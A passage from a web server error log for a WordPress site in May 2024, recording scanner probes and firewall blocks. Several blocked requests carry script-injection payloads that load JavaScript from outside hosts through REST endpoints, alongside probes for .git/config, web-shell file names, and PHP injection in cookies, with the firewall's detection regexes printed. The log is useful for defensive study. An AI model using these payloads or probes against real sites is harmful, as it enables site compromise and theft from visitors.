(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon May 27 23:19:35.531271 2024] [:error] [pid 31229:tid 140303939847936] [client 82.208.22.221:42198] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon May 27 23:19:36.447626 2024] [autoindex:error] [pid 30597:tid 140304074131200] [client 82.208.22.221:42202] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon May 27 23:19:37.478064 2024] [autoindex:error] [pid 30597:tid 140304065738496] [client 82.208.22.221:42206] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon May 27 23:19:44.107159 2024] [:error] [pid 30598:tid 140303914669824] [client 82.208.22.221:42220] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon May 27 23:19:44.340044 2024] [:error] [pid 30598:tid 140303965026048] [client 82.208.22.221:42222] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue May 28 00:38:45.391687 2024] [authz_core:error] [pid 30597:tid 140303998596864] [client 46.101.1.225:43730] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/28 00:38:49 [error] 30554#30554: *110033 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue May 28 00:43:01.356437 2024] [authz_core:error] [pid 31229:tid 140303914669824] [client 206.81.12.187:43936] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/28 00:43:04 [error] 30554#30554: *110102 access forbidden by rule, client: 206.81.12.187, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue May 28 02:25:42.928252 2024] [autoindex:error] [pid 31229:tid 140303923062528] [client 159.223.34.107:45912] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 28 03:10:39.821334 2024] [autoindex:error] [pid 30599:tid 140304040560384] [client 159.223.34.107:46580] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 28 03:29:21.538366 2024] [ssl:warn] [pid 17886:tid 139855507167104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 28 03:29:33.853125 2024] [ssl:warn] [pid 17890:tid 139855507167104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 28 03:29:34.300264 2024] [ssl:warn] [pid 17890:tid 139855507167104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 28 03:29:36.549159 2024] [ssl:warn] [pid 17890:tid 139855507167104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 28 03:29:38.861268 2024] [ssl:warn] [pid 18307:tid 140061629527936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 28 03:29:47.077638 2024] [ssl:warn] [pid 18310:tid 140061629527936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 28 07:11:54.930192 2024] [autoindex:error] [pid 18962:tid 140061249050368] [client 159.223.34.107:52822] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 28 07:30:59.438738 2024] [autoindex:error] [pid 18962:tid 140061265835776] [client 159.223.34.107:53140] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 28 09:10:03.481904 2024] [authz_core:error] [pid 18962:tid 140061282621184] [client 172.105.158.219:55204] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/28 09:10:06 [error] 18288#18288: *117688 access forbidden by rule, client: 172.105.158.219, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue May 28 13:34:18.114804 2024] [authz_core:error] [pid 18332:tid 140061332977408] [client 142.93.129.190:33622] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/28 13:34:22 [error] 18288#18288: *121253 access forbidden by rule, client: 142.93.129.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed May 29 01:58:12.147768 2024] [:error] [pid 18332:tid 140061274228480] [client 179.43.191.18:45736] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZlbSBInwKWk68GMlECFc2wAAAIw"], referer: http://investigacionperu.com [Wed May 29 02:24:41.847181 2024] [authz_core:error] [pid 18962:tid 140061249050368] [client 159.89.17.243:46174] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/29 02:24:45 [error] 18288#18288: *128824 access forbidden by rule, client: 159.89.17.243, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed May 29 03:41:27.443533 2024] [ssl:warn] [pid 28300:tid 140054600546176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 29 03:41:35.827683 2024] [ssl:warn] [pid 28302:tid 140054600546176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 29 03:41:36.307951 2024] [ssl:warn] [pid 28302:tid 140054600546176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 29 03:41:38.328760 2024] [ssl:warn] [pid 28302:tid 140054600546176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 29 03:41:40.646824 2024] [ssl:warn] [pid 28747:tid 139648173688704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 29 03:41:48.952838 2024] [ssl:warn] [pid 28749:tid 139648173688704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 29 06:33:18.177734 2024] [:error] [pid 29379:tid 139647740983040] [client 5.188.62.140:50590] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZlcSfqsq9LgzGxrL8pMyAAAAANU"] 2024/05/29 07:26:31 [error] 28729#28729: *131924 access forbidden by rule, client: 54.193.58.227, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/29 07:26:31 [error] 28728#28728: *131925 access forbidden by rule, client: 54.193.58.227, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/29 07:31:46 [error] 28728#28728: *131961 access forbidden by rule, client: 3.101.23.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/29 07:31:46 [error] 28728#28728: *131962 access forbidden by rule, client: 3.101.23.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed May 29 08:37:12.064073 2024] [authz_core:error] [pid 28768:tid 139647740983040] [client 167.99.210.137:52668] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/29 08:37:15 [error] 28729#28729: *133104 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed May 29 09:22:00.018352 2024] [:error] [pid 29379:tid 139647850088192] [client 89.248.174.182:53622] [client 89.248.174.182] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://go.kcloudinc.com></script> found within ARGS:result[_msg]: <script src=https://go.kcloudinc.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zlc6CKsq9LgzGxrL8pMzjAAAAMg"] [Wed May 29 12:41:05.222605 2024] [authz_core:error] [pid 28767:tid 139647900444416] [client 64.227.32.66:58090] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/29 12:41:09 [error] 28728#28728: *136112 access forbidden by rule, client: 64.227.32.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed May 29 15:05:38.525122 2024] [authz_core:error] [pid 28767:tid 139647816517376] [client 138.68.82.23:33080] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/29 15:05:42 [error] 28728#28728: *138089 access forbidden by rule, client: 138.68.82.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed May 29 17:14:12.991044 2024] [:error] [pid 29379:tid 139647791339264] [client 178.159.37.38:36124] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZleotKsq9LgzGxrL8pM4KAAAAM8"], referer: www.google.com [Wed May 29 17:14:14.535567 2024] [:error] [pid 29379:tid 139647850088192] [client 178.159.37.38:36126] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zleotqsq9LgzGxrL8pM4KQAAAMg"], referer: www.google.com [Wed May 29 23:26:06.396608 2024] [:error] [pid 28767:tid 139647774553856] [client 82.165.103.249:40456] [client 82.165.103.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/incache/index.php"] [unique_id "Zlf_3iY4nc002RkA6jH5BgAAAFE"], referer: www.google.com [Wed May 29 23:26:09.820467 2024] [:error] [pid 29379:tid 139647866873600] [client 82.165.103.249:40462] [client 82.165.103.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/incache/index.php"] [unique_id "Zlf_4asq9LgzGxrL8pM6OgAAAMY"], referer: www.google.com [Wed May 29 23:26:22.050204 2024] [:error] [pid 28768:tid 139647740983040] [client 82.165.103.249:40466] [client 82.165.103.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zlf_7kOYKpd-Hy7WSzlfeAAAAJU"], referer: www.google.com [Wed May 29 23:26:40.140870 2024] [:error] [pid 28766:tid 139647875266304] [client 82.165.103.249:40468] [client 82.165.103.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZlgAAIu-dVxttkRKGaxBjQAAAAU"], referer: www.google.com [Thu May 30 03:29:30.347645 2024] [ssl:warn] [pid 7647:tid 140341243189120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 30 03:29:34.614965 2024] [ssl:warn] [pid 7648:tid 140341243189120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 30 03:29:35.104009 2024] [ssl:warn] [pid 7648:tid 140341243189120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 30 03:29:37.103927 2024] [ssl:warn] [pid 7648:tid 140341243189120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 30 03:29:39.362749 2024] [ssl:warn] [pid 8066:tid 140347363477376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 30 03:29:43.566523 2024] [ssl:warn] [pid 8067:tid 140347363477376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 30 03:44:30.273188 2024] [autoindex:error] [pid 8741:tid 140347180730112] [client 159.223.34.107:46898] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu May 30 04:38:58.162150 2024] [authz_core:error] [pid 8085:tid 140347138766592] [client 206.189.2.13:47616] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/30 04:39:02 [error] 8047#8047: *147432 access forbidden by rule, client: 206.189.2.13, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu May 30 04:57:39.409204 2024] [authz_core:error] [pid 8085:tid 140347048982272] [client 206.81.24.227:47886] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/30 04:57:43 [error] 8048#8048: *147634 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu May 30 14:00:42.455963 2024] [autoindex:error] [pid 8741:tid 140346914699008] [client 4.227.120.157:57642] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu May 30 14:52:22.372122 2024] [authz_core:error] [pid 8086:tid 140346914699008] [client 46.101.111.185:58542] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/30 14:52:26 [error] 8048#8048: *153770 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu May 30 15:53:33.440165 2024] [authz_core:error] [pid 8741:tid 140347048982272] [client 165.227.173.41:59866] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/30 15:53:37 [error] 8048#8048: *154588 access forbidden by rule, client: 165.227.173.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu May 30 16:22:11.597910 2024] [:error] [pid 8741:tid 140347048982272] [client 93.174.93.127:60446] [client 93.174.93.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:query. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cloud.cdninta.com></script> found within ARGS:query: <script src=https://cloud.cdninta.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/ywcas/v1/search"] [unique_id "ZljuA-6XhUmP-6oZ2y5FdwAAAMc"], referer: http://investigacionperu.com [Thu May 30 19:03:16.458227 2024] [ssl:warn] [pid 8067:tid 140347363477376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 30 20:24:29.638968 2024] [:error] [pid 6652:tid 140346923091712] [client 93.174.93.127:36414] [client 93.174.93.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:query. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cloud.cdninta.com></script> found within ARGS:query: <script src=https://cloud.cdninta.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/ywcas/v1/search"] [unique_id "ZlkmzZJix2kJjblos86fBgAAAJY"], referer: https://investigacionperu.com [Thu May 30 20:36:01.822871 2024] [:error] [pid 6792:tid 140346965055232] [client 5.188.62.140:36582] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZlkpgWre5xQrZ3iy197n1wAAANE"] [Thu May 30 20:36:02.491881 2024] [:error] [pid 6652:tid 140347172337408] [client 5.188.62.140:36584] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZlkpgpJix2kJjblos86fFwAAAIE"] 2024/05/31 00:45:30 [error] 6639#6639: *160436 access forbidden by rule, client: 138.68.86.32, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/05/31 00:45:30 [error] 6640#6640: *160438 access forbidden by rule, client: 209.38.248.17, server: webmail.investigacionperu.com, request: 